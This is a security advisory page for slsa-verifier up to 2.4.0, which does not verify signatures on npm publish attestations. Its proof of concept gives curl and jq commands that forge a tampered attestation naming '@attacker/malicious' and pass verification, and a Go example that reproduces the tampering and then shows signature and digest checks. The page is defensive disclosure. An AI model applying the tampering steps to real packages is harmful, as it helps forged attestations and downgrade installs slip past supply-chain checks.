Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS1yMnh2LXZwcjItNDJtOc4AA2_p
slsa-verifier vulnerable to improper validation of npm's publish attestations
Summary
slsa-verifier <= 2.4.0 does not correctly verify the signature on npm's publish attestations.
Proof of concept
Steps to reproduce:
- Download the package's attestations and tarball:
curl -Sso attestations.json "$(npm view @trishankatdatadog/supreme-goggles --json | jq -r '.dist.attestations.url')"
curl -Sso supreme-goggles.tgz "$(npm view @trishankatdatadog/supreme-goggles --json | jq -r '.dist.tarball')"
- In attestations.json, take the value addressed by the jq selector .attestations[0].bundle.dsseEnvelope.payload, base64-decode it, tamper with it, base64-encode the result, and replace the original value with it. Save the file as attestations_tampered.json. Here is an example command that replaces the package name with @attacker/malicious:
jq -r ".attestations[0].bundle.dsseEnvelope.payload = \"$(jq -r '.attestations[0].bundle.dsseEnvelope.payload | @base64d' < attestations.json | jq '.subject[0].name = "pkg:npm/%40attacker/malicious"' | base64 -w0)\"" < attestations.json > attestations_tampered.json
- Run slsa-verifier against the tarball with the tampered attestations:
SLSA_VERIFIER_EXPERIMENTAL=1 slsa-verifier verify-npm-package supreme-goggles.tgz --attestations-path attestations_tampered.json --builder-id "https://github.com/actions/runner/github-hosted" --package-name "@trishankatdatadog/supreme-goggles" --package-version 1.0.5 --source-uri github.com/trishankatdatadog/supreme-goggles
- The result is that slsa-verifier fails to detect this tampering of the publish attestation (unlike with the provenance attestation) and returns PASSED.
Impact
An attacker who controls what packages and attestations are shown to a user can associate a package with an arbitrary name and version that do not match what the user expects from the publish attestation. Furthermore, the package digest in the publish attestation need not match its counterpart in the provenance attestation. However, the attacker cannot associate the given package with an arbitrary source and builder that the user does not expect from the provenance attestation. Thus, the attacker could, for example, convince package managers to install authentic but older versions of packages that contain known, exploitable vulnerabilities.
Severity is considered low because 1) it does not invalidate the provenance and 2) support for npm is currently experimental.
Patches
Fixed by PR #705 and released in versions >= 2.4.1.
Workarounds
There is no easy way for users to remediate this vulnerability without upgrading, short of verifying npm's publish attestations themselves and cross-verifying them against the GitHub Actions provenance attestations.
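The Go program below is an added example written for this page; it is not part of the advisory, of the PR, or of slsa-verifier's code base. It reproduces the tampering step of the proof of concept above (edit the subject name inside the base64 payload and re-encode it without re-signing) and then performs the verification the Workarounds section asks users to do for themselves: check the DSSE signature over the publish attestation before trusting anything in it, then check the package name, version and tarball digest, and require that digest to equal the subject digest of the separately verified provenance attestation. Assumptions: a freshly generated ECDSA P-256 key stands in for the npm registry's signing key (a real verifier holds only the registry's public key), the subject name layout pkg:npm/%40scope/name@version and the predicateType URL follow the publish v0.1 spec linked in the references as I read it, the tarball digest is a constructed placeholder, and the function names SignPublish, VerifyPublish, TamperSubject, purl and pae are mine.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"fmt"
	"strings"
)

// Envelope mirrors .attestations[i].bundle.dsseEnvelope in npm's attestations.json.
type Envelope struct {
	PayloadType string      `json:"payloadType"`
	Payload     string      `json:"payload"` // base64 of the in-toto Statement
	Signatures  []Signature `json:"signatures"`
}
type Signature struct {
	Sig string `json:"sig"` // base64 signature over PAE(payloadType, decoded payload)
}
type Statement struct { // the parts of the in-toto Statement this check reads
	PredicateType string    `json:"predicateType"`
	Subject       []Subject `json:"subject"`
}
type Subject struct {
	Name   string            `json:"name"`
	Digest map[string]string `json:"digest"`
}
const payloadType = "application/vnd.in-toto+json"
const publishV01 = "https://github.com/npm/attestation/tree/main/specs/publish/v0.1"

// pae is DSSE's pre-authentication encoding, computed over the decoded body.
func pae(typ string, body []byte) []byte {
	return []byte(fmt.Sprintf("DSSEv1 %d %s %d %s", len(typ), typ, len(body), body))
}

// purl builds the subject name, e.g. pkg:npm/%40scope/name@1.0.5 (layout assumed, see lead-in).
func purl(name, version string) string {
	return "pkg:npm/" + strings.ReplaceAll(name, "@", "%40") + "@" + version
}

// SignPublish stands in for the npm registry so the example runs offline.
func SignPublish(priv *ecdsa.PrivateKey, name, version, sha512hex string) (Envelope, error) {
	body, err := json.Marshal(Statement{PredicateType: publishV01,
		Subject: []Subject{{Name: purl(name, version), Digest: map[string]string{"sha512": sha512hex}}}})
	if err != nil {
		return Envelope{}, err
	}
	h := sha256.Sum256(pae(payloadType, body))
	sig, err := ecdsa.SignASN1(rand.Reader, priv, h[:])
	if err != nil {
		return Envelope{}, err
	}
	return Envelope{PayloadType: payloadType, Payload: base64.StdEncoding.EncodeToString(body),
		Signatures: []Signature{{Sig: base64.StdEncoding.EncodeToString(sig)}}}, nil
}

// VerifyPublish is the check slsa-verifier <= 2.4.0 skipped: verify the DSSE signature
// before trusting the statement, then require its digest to match both the tarball and
// the subject digest of the separately verified provenance attestation.
func VerifyPublish(env Envelope, pub *ecdsa.PublicKey, name, version, tarballSHA512, provenanceSHA512 string) error {
	body, err := base64.StdEncoding.DecodeString(env.Payload)
	if err != nil {
		return fmt.Errorf("payload: %w", err)
	}
	h := sha256.Sum256(pae(env.PayloadType, body))
	verified := false
	for _, s := range env.Signatures {
		sig, err := base64.StdEncoding.DecodeString(s.Sig)
		verified = verified || (err == nil && ecdsa.VerifyASN1(pub, h[:], sig))
	}
	if !verified {
		return fmt.Errorf("DSSE signature invalid: payload tampered or signed by another key")
	}
	var st Statement
	if err := json.Unmarshal(body, &st); err != nil {
		return fmt.Errorf("statement: %w", err)
	}
	if st.PredicateType != publishV01 || len(st.Subject) != 1 || st.Subject[0].Name != purl(name, version) {
		return fmt.Errorf("statement does not describe %s", purl(name, version))
	}
	if d := st.Subject[0].Digest["sha512"]; d != tarballSHA512 || d != provenanceSHA512 {
		return fmt.Errorf("subject digest differs from the tarball or from the provenance attestation")
	}
	return nil
}

// TamperSubject reproduces the advisory's jq step: edit the subject name in the decoded payload and re-encode it, signature untouched.
func TamperSubject(env Envelope, oldName, newName string) Envelope {
	body, _ := base64.StdEncoding.DecodeString(env.Payload)
	env.Payload = base64.StdEncoding.EncodeToString([]byte(strings.Replace(string(body), oldName, newName, 1)))
	return env
}
func main() {
	const name, version = "@trishankatdatadog/supreme-goggles", "1.0.5"
	digest := strings.Repeat("ab", 64)                        // constructed stand-in for sha512(supreme-goggles.tgz)
	priv, _ := ecdsa.GenerateKey(elliptic.P256(), rand.Reader) // stands in for the registry's signing key
	env, _ := SignPublish(priv, name, version, digest)
	fmt.Println("genuine: ", VerifyPublish(env, &priv.PublicKey, name, version, digest, digest))
	bad := TamperSubject(env, purl(name, version), "pkg:npm/%40attacker/malicious")
	fmt.Println("tampered:", VerifyPublish(bad, &priv.PublicKey, name, version, digest, digest))
}
```

Running the file prints a nil error for the genuine envelope and a signature error for the tampered one. The order of checks is the point: the signature is verified over the pre-authentication encoding of the decoded payload first, so a payload edited and re-encoded as in the proof of concept is rejected before its name, version or digest are ever compared, and the digest comparison against the provenance subject closes the gap the Impact section describes, where the two attestations could otherwise name different tarballs.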
References
Permalink: https://github.com/advisories/GHSA-r2xv-vpr2-42m9
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yMnh2LXZwcjItNDJtOc4AA2_p
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Low
Classification: General
Published: about 1 year ago
Updated: about 1 year ago
Identifiers: GHSA-r2xv-vpr2-42m9
References:
- https://github.com/slsa-framework/slsa-verifier/security/advisories/GHSA-r2xv-vpr2-42m9
- https://github.com/slsa-framework/slsa-verifier/pull/705
- https://github.com/slsa-framework/slsa-verifier/commit/f6ae402f458b347d2c414f1d053fc1f8257888d0
- https://github.com/npm/attestation/tree/main/specs/publish/v0.1
- https://openssf.slack.com/archives/C03PDLFET5W/p1695330038983179
- https://github.com/advisories/GHSA-r2xv-vpr2-42m9
Blast Radius: 0.0
Affected Packages
go:github.com/slsa-framework/slsa-verifier
Dependent packages: 1
Dependent repositories: 1
Downloads:
Affected Version Ranges: <= 1.4.1
No known fixed version
All affected versions: 0.0.1, 1.0.0, 1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.0.5, 1.1.0, 1.1.1, 1.1.2, 1.1.3, 1.2.0, 1.2.1, 1.2.2, 1.3.0, 1.3.1, 1.3.2, 1.4.0, 1.4.1
go:github.com/slsa-framework/slsa-verifier/v2
Dependent packages: 2
Dependent repositories: 1
Downloads:
Affected Version Ranges: <= 2.4.0
Fixed in: 2.4.1-rc.0
All affected versions: 2.0.0, 2.0.1, 2.1.0, 2.2.0, 2.3.0, 2.4.0
All unaffected versions: 2.4.1, 2.5.1, 2.6.0